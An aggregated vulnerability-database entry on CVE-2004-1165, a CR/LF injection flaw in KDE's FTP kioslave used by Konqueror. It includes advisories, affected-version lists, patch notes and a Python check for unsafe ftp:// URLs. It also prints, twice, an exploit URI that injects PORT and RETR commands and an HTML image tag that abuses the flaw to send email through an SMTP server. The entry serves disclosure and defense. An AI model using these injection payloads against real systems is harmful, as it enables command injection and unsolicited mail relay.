CVE-2004-1165
CVSS 7.5
Published: 2005-01-10 00:00:00
Last modified: 2017-10-10 21:29:42

[Original] Konqueror 3.3.1 allows remote attackers to execute arbitrary FTP commands via an ftp:// URL that contains a URL-encoded newline ("%0a") before the FTP command, which causes the commands to be inserted into the resulting FTP session, as demonstrated using a PORT command.


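[CNNVD] Konqueror FTP command execution vulnerability (CNNVD-200501-041)

        Konqueror is an open-source web browser.
        Konqueror 3.3.1 has a flaw in its FTP handling that allows remote attackers to execute arbitrary FTP commands.
        By placing a URL-encoded newline ("%0a") in an FTP URL, a remote attacker causes the FTP commands inserted after it to be executed in the FTP session.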

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:kde:kdelibs:3.1
cpe:/a:kde:kdelibs:3.1.1
cpe:/a:kde:kdelibs:3.1.2
cpe:/a:kde:kdelibs:3.1.3
cpe:/a:kde:kdelibs:3.1.4
cpe:/a:kde:kdelibs:3.1.5
cpe:/a:kde:kdelibs:3.2
cpe:/a:kde:kdelibs:3.2.1
cpe:/a:kde:kdelibs:3.2.2
cpe:/a:kde:konqueror:3.3.1

- OVAL (technical details for detection)

oval:org.mitre.oval:def:9645
Konqueror 3.3.1 allows remote attackers to execute arbitrary FTP commands via an ftp:// URL that contains a URL-encoded newline ("%0a") befo...
* OVAL describes in detail how to detect this vulnerability; more technical detail on detection is available in the related OVAL definition.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1165
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1165
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200501-041
(Official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=110245752232681&w=2
(UNKNOWN)  BUGTRAQ  20041205 7a69Adv#16 - Konqueror FTP command injection
http://www.debian.org/security/2005/dsa-631
(UNKNOWN)  DEBIAN  DSA-631
http://www.gentoo.org/security/en/glsa/glsa-200501-18.xml
(UNKNOWN)  GENTOO  GLSA-200501-18
http://www.mandriva.com/security/advisories?name=MDKSA-2005:045
(UNKNOWN)  MANDRAKE  MDKSA-2005:045
http://www.redhat.com/support/errata/RHSA-2005-009.html
(UNKNOWN)  REDHAT  RHSA-2005:009
http://www.redhat.com/support/errata/RHSA-2005-065.html
(UNKNOWN)  REDHAT  RHSA-2005:065
https://exchange.xforce.ibmcloud.com/vulnerabilities/18384
(UNKNOWN)  XF  web-browser-ftp-command-execution(18384)

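- Vulnerability information

Konqueror FTP command execution vulnerability
High risk; input validation
2005-01-10 00:00:00 2005-10-20 00:00:00
Remote
        Konqueror is an open-source web browser.
        Konqueror 3.3.1 has a flaw in its FTP handling that allows remote attackers to execute arbitrary FTP commands.
        By placing a URL-encoded newline ("%0a") in an FTP URL, a remote attacker causes the FTP commands inserted after it to be executed in the FTP session.

- Advisories and patches

        The vendor has released an upgrade patch that fixes this security issue. The patch is available at:
        http://www.kde.org/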

- Vulnerability information (24801)

KDE FTP KIOSlave URI Arbitrary FTP Server Command Execution Vulnerability (EDBID:24801)
linux remote
2004-12-06 Verified
0 Albert Puigsech Galicia
N/A
source: http://www.securityfocus.com/bid/11827/info

KDE FTP kioslave-based applications such as Konqueror are reported prone to an arbitrary FTP server command execution vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input prior to utilizing it to execute FTP commands on remote servers.

This vulnerability allows attackers to embed arbitrary FTP server commands in malicious URIs. Upon following this malicious URI, the victim user's Web browser will reportedly connect to the attacker-specified FTP server, and the malicious commands will be sent to the server. This may allow malicious files to be downloaded to the victim's computer without their knowledge. Other attacks are also likely possible.

Note: It has been reported that this issue can be leveraged to send email to arbitrary addresses without user interaction.

ftp://ftp.example.com/%0aPORT%20a,b,c,d,e,f%0aRETR%20/file

The 'a,b,c,d,e,f' would represent the IP address and port specifications, as per the FTP RFCs.

This issue has also been reported to allow for the sending of email without user interaction. Embedding the following image into an HTML page reportedly sends an email:

<img src="ftp://foo%0d%0aHELO%20mail%0d%0aMAIL%20FROM%3a&lt;&gt;%0d%0aRCPT%20TO%3a&lt;username%40example.com&gt;%0d%0aDATA%0d%0aSubject%3a%20hacked%0d%0aTo%3a%20username%40example.com%0d%0a%0d%0ahacked%0d%0a.%0d%0a:username@mx.example.net:25/" />		
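The missing sanitization described above amounts to percent-decoding a URL component and pasting it into a command line without checking for line terminators. The following is an added example, not code from kdelibs or from any of the advisories quoted here: a Python check that rejects ftp:// URLs whose decoded user, password or path contains a control character, next to a simplified model of the unchecked behaviour. All function names and the sample URLs other than the first are constructed for illustration.

```python
from urllib.parse import urlsplit, unquote

# Constructed sample URLs; the first is the example URI quoted in this entry.
SAMPLES = [
    "ftp://ftp.example.com/%0aPORT%20a,b,c,d,e,f%0aRETR%20/file",
    "ftp://user%0d%0aNOOP:pw@ftp.example.com/pub/file.txt",
    "ftp://ftp.example.com/pub/file.txt",
]

def _is_control(ch):
    # C0 controls (includes CR, LF, NUL) and DEL never belong in an FTP argument.
    return ord(ch) < 0x20 or ord(ch) == 0x7F

def unsafe_components(url):
    """Names of ftp:// URL components whose decoded value holds a control character."""
    parts = urlsplit(url)
    if parts.scheme.lower() != "ftp":
        raise ValueError("not an ftp:// URL")
    fields = {
        "user": parts.username or "",
        "password": parts.password or "",
        "path": parts.path,
    }
    return sorted(name for name, raw in fields.items()
                  if any(_is_control(c) for c in unquote(raw)))

def naive_retr_lines(url):
    """Simplified model of the flaw: decode the path, then paste it into one command."""
    wire = "RETR " + unquote(urlsplit(url).path) + "\r\n"
    return wire.splitlines()  # what the server parses as separate command lines

def checked_retr(url):
    """Build the RETR command only if no decoded component can end the line early."""
    bad = unsafe_components(url)
    if bad:
        raise ValueError("control character in URL component(s): " + ", ".join(bad))
    return "RETR " + unquote(urlsplit(url).path) + "\r\n"

if __name__ == "__main__":
    for u in SAMPLES:
        print(u, "->", unsafe_components(u) or "clean")
```

The check runs on the decoded value because the raw URL contains only the harmless-looking "%0a" and "%0d" escapes; the same function can be run over proxy or browser history logs to flag ftp:// URLs of this shape.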

- Vulnerability information (F35605)

KDE Security Advisory 2005-01-01.1 (PacketStormID:F35605)
2005-01-05 00:00:00
KDE Desktop  kde.org
advisory,remote,arbitrary,protocol
CVE-2004-1165

KDE Security Advisory: KDE applications which use the ftp kioslave, e.g. Konqueror, allow remote attackers to execute arbitrary FTP commands via an ftp:// URL that contains an URL-encoded newline ( %0a ) before the ftp command, which causes the commands to be inserted into the resulting FTP session. Due to similarities between the ftp and the SMTP protocol, this vulnerability allows to misuse the ftp slave to connect to a SMTP server and issue arbitrary commands, like sending an email. Systems affected: All KDE releases up to including KDE 3.3.2.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


KDE Security Advisory: ftp kioslave command injection
Original Release Date: 2005-01-01
URL: http://www.kde.org/info/security/advisory-20050101-1.txt

0. References

        http://www.securityfocus.com/bid/11827
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-1165


1. Systems affected:

        All KDE releases up to including KDE 3.3.2.


2. Overview:

        KDE applications which use the ftp kioslave, e.g. Konqueror, allow
        remote attackers to execute arbitrary FTP commands via an ftp://
        URL that contains an URL-encoded newline ( %0a ) before the ftp
        command, which causes the commands to be inserted into the resulting
        FTP session. 

        Due to similiarities between the ftp and the SMTP protocol, this
        vulnerability allows to misuse the ftp slave to connect to a
        SMTP server and issue arbitrary commands, like sending an email.


3. Impact:

        The FTP kioslave can be misused to execute any ftp command on the
        server or be a vector for sending out unsolicited email.


4. Solution:

        Source code patches have been made available which fix these
        vulnerabilities. Contact your OS vendor / binary package provider
        for information about how to obtain updated binary packages.


5. Patch:

        Patch for KDE 3.2.3 is available from 
        ftp://ftp.kde.org/pub/kde/security_patches :

        a639b7b592f005e911c454a0a8c9c542  post-3.2.3-kdelibs-kioslave.patch

        Patch for KDE 3.3.2 is available from 
        ftp://ftp.kde.org/pub/kde/security_patches :

        fe67157b26a8cdf5bcfa1898cdf3b154  post-3.3.2-kdelibs-kioslave.patch


6. Time line and credits:

        26/12/2004 Public bug report filed against kio_ftp by Thiago Macieira
                   about being able to send email via kio_ftp CR/LF injection.
        26/12/2004 Patches developed by Thiago Macieira developed and applied
                   to CVS.
        01/01/2005 Advisory released.



-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.5 (GNU/Linux)

iD8DBQFB1ZPcvsXr+iuy1UoRAiSWAJ49IvuT9yPcKVFqjN2fFthdHOwOGACfX+qH
0iekelUzvQw3OPsLuOPFixg=
=57Wh
-----END PGP SIGNATURE-----
    

- Vulnerability information

12853
Multiple Browser FTP Client Arbitrary Mail Relay
Remote / Network Access
Loss of Integrity

- Vulnerability description

- Timeline

2004-12-23 Unknown
2004-12-23 Unknown

- Solution

Products

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

KDE FTP KIOSlave URI Arbitrary FTP Server Command Execution Vulnerability
Input Validation Error 11827
Yes No
2004-12-06 12:00:00 2009-07-12 08:07:00
Albert Puigsech Galicia <ripe@7a69ezine.org> disclosed this vulnerability.

- Affected software versions

SGI ProPack 3.0
S.u.S.E. Linux Personal 9.2
S.u.S.E. Linux Personal 9.1
S.u.S.E. Linux Personal 9.0 x86_64
S.u.S.E. Linux Personal 9.0
S.u.S.E. Linux Personal 8.2
S.u.S.E. Linux 8.1
S.u.S.E. Linux 8.0 i386
S.u.S.E. Linux 8.0
RedHat Enterprise Linux WS 3
RedHat Enterprise Linux WS 2.1 IA64
RedHat Enterprise Linux WS 2.1
RedHat Enterprise Linux ES 3
RedHat Enterprise Linux ES 2.1 IA64
RedHat Enterprise Linux ES 2.1
RedHat Desktop 3.0
RedHat Advanced Workstation for the Itanium Processor 2.1 IA64
RedHat Advanced Workstation for the Itanium Processor 2.1
Red Hat Fedora Core3
Red Hat Fedora Core2
Red Hat Enterprise Linux AS 3
Red Hat Enterprise Linux AS 2.1 IA64
Red Hat Enterprise Linux AS 2.1
KDE Konqueror 3.3.2
KDE Konqueror 3.3.1
KDE Konqueror 3.3
KDE Konqueror 3.2.3
KDE Konqueror 3.2.2 -6
KDE Konqueror 3.2.1
KDE Konqueror 3.1.5
KDE Konqueror 3.1.4
KDE Konqueror 3.1.3
KDE Konqueror 3.1.2
+ KDE KDE 3.1.2
KDE Konqueror 3.1.1
+ KDE KDE 3.1.1
KDE Konqueror 3.1
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
+ Mandriva Linux Mandrake 9.1
KDE Konqueror 3.0.5 b
KDE Konqueror 3.0.5
+ MandrakeSoft Corporate Server 2.1
+ Mandriva Linux Mandrake 9.0
+ Mandriva Linux Mandrake 9.0
KDE Konqueror 3.0.3
+ KDE KDE 3.0.3
KDE Konqueror 3.0.2
+ KDE KDE 3.0.2
KDE Konqueror 3.0.1
+ KDE KDE 3.0.1
KDE Konqueror 3.0
+ KDE KDE 3.0
KDE kdelibs 3.2.2
+ KDE KDE 3.2.2
+ Red Hat Fedora Core2
KDE kdelibs 3.2.1
KDE kdelibs 3.2
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ MandrakeSoft Corporate Server 3.0 x86_64
+ MandrakeSoft Corporate Server 3.0
+ Mandriva Linux Mandrake 10.1 x86_64
+ Mandriva Linux Mandrake 10.1
+ Mandriva Linux Mandrake 10.0 AMD64
+ Mandriva Linux Mandrake 10.0
KDE kdelibs 3.1.5
+ KDE KDE 3.1.5
KDE kdelibs 3.1.4
+ KDE KDE 3.1.4
KDE kdelibs 3.1.3
+ KDE KDE 3.1.3
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2
KDE kdelibs 3.1.2
KDE kdelibs 3.1.1
+ KDE KDE 3.1.1
KDE kdelibs 3.1
+ KDE KDE 3.1
KDE KDE 3.3.2
+ Debian Linux 3.1 sparc
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 amd64
+ Debian Linux 3.1 amd64
+ Debian Linux 3.1 amd64
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1
+ Debian Linux 3.1
+ Debian Linux 3.1
KDE KDE 3.3.1
+ Red Hat Fedora Core3
KDE KDE 3.3
KDE KDE 3.2.3
KDE KDE 3.2.2
+ KDE KDE 3.2.2
+ Red Hat Fedora Core2
KDE KDE 3.2.1
KDE KDE 3.2
KDE KDE 3.1.5
KDE KDE 3.1.4
KDE KDE 3.1.3
+ Red Hat Enterprise Linux AS 3
+ Red Hat Enterprise Linux AS 3
+ RedHat Desktop 3.0
+ RedHat Desktop 3.0
+ RedHat Enterprise Linux ES 3
+ RedHat Enterprise Linux ES 3
+ RedHat Enterprise Linux WS 3
KDE KDE 3.1.2
+ Conectiva Linux 9.0
+ Conectiva Linux 9.0
+ KDE KDE 3.1.2
KDE KDE 3.1.1 a
KDE KDE 3.1.1
+ Conectiva Linux 9.0
+ S.u.S.E. Linux Personal 8.2
+ S.u.S.E. Linux Personal 8.2
KDE KDE 3.1
+ RedHat Linux 9.0 i386
+ S.u.S.E. Linux 8.1
+ S.u.S.E. Linux 8.1
KDE KDE 3.0.5 b
KDE KDE 3.0.5 a
+ RedHat Linux 8.0 i386
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.3 i386
KDE KDE 3.0.5
+ Conectiva Linux 8.0
KDE KDE 3.0.4
+ Conectiva Linux 8.0
+ Gentoo Linux 1.4 _rc1
+ Gentoo Linux 1.2
+ Gentoo Linux 1.2
KDE KDE 3.0.3 a
KDE KDE 3.0.3
+ Conectiva Linux 8.0
+ Conectiva Linux 8.0
+ Conectiva Linux Enterprise Edition 1.0
+ FreeBSD FreeBSD 4.7 -STABLE
+ FreeBSD FreeBSD 4.7 -STABLE
+ Mandriva Linux Mandrake 9.0
+ Mandriva Linux Mandrake 9.0
KDE KDE 3.0.2
+ Mandriva Linux Mandrake 8.2
KDE KDE 3.0.1
KDE KDE 3.0
+ Conectiva Linux 8.0

- Discussion

KDE FTP kioslave-based applications such as Konqueror are reported prone to an arbitrary FTP server command execution vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input prior to utilizing it to execute FTP commands on remote servers.

This vulnerability allows attackers to embed arbitrary FTP server commands in malicious URIs. Upon following this malicious URI, the victim user's Web browser will reportedly connect to the attacker-specified FTP server, and the malicious commands will be sent to the server. This may allow malicious files to be downloaded to the victim's computer without their knowledge. Other attacks are also likely possible.

Note: It has been reported that this issue can be leveraged to send email to arbitrary addresses without user interaction.

- Exploit

An example URI sufficient to exploit this vulnerability is provided:

ftp://ftp.example.com/%0aPORT%20a,b,c,d,e,f%0aRETR%20/file

The 'a,b,c,d,e,f' would represent the IP address and port specifications, as per the FTP RFCs.

This issue has also been reported to allow for the sending of email without user interaction. Embedding the following image into an HTML page reportedly sends an email:

<img src="ftp://foo%0d%0aHELO%20mail%0d%0aMAIL%20FROM%3a&lt;&gt;%0d%0aRCPT%20TO%3a&lt;username%40example.com&gt;%0d%0aDATA%0d%0aSubject%3a%20hacked%0d%0aTo%3a%20username%40example.com%0d%0a%0d%0ahacked%0d%0a.%0d%0a:username@mx.example.net:25/" />

- Solution

Mandrake Linux has released an advisory (MDKSA-2004:160) dealing with this issue. Mandrake has also released an additional advisory to address this issue (MDKSA-2005:045). Please see the referenced advisories for more information.

Debian has released advisory DSA 631-1 to provide updates for kdelibs. Please see the attached advisory for details on obtaining and applying fixes.

Gentoo has released an advisory to provide updates for this issue. Updates may be applied by running the following commands as the superuser:
emerge --sync
emerge --ask --oneshot --verbose kde-base/kdelibs

KDE has released patches for KDE 3.2.3 and 3.3.2.

Fedora has released advisories FEDORA-2005-063 and FEDORA-2005-064 for Fedora Core 2 and 3. These advisories contain updated kdelibs packages. Please see the referenced advisories for more information.

SuSE Linux has released a security summary report (SUSE-SR:2005:003) that contains fixes to address this and other vulnerabilities. Customers are advised to peruse the referenced advisory for further information regarding obtaining and applying appropriate updates.

Red Hat has released advisory RHSA-2005:009-19 to address issues in KDE. Please see the advisory in Web references for more information.

SGI has released advisory 20050207-01-U including Patch 10144 that contains updated SGI ProPack 3 Service Pack 4 RPMs for the SGI Altix products. This patch addresses various issues. Please see the referenced advisory for more information.


SGI ProPack 3.0

KDE KDE 3.1.1

KDE KDE 3.1.4

KDE KDE 3.2

KDE KDE 3.2.1

KDE KDE 3.2.2

KDE Konqueror 3.2.3

KDE KDE 3.2.3

KDE KDE 3.3

KDE KDE 3.3.2

KDE Konqueror 3.3.2

- Related references

 

 
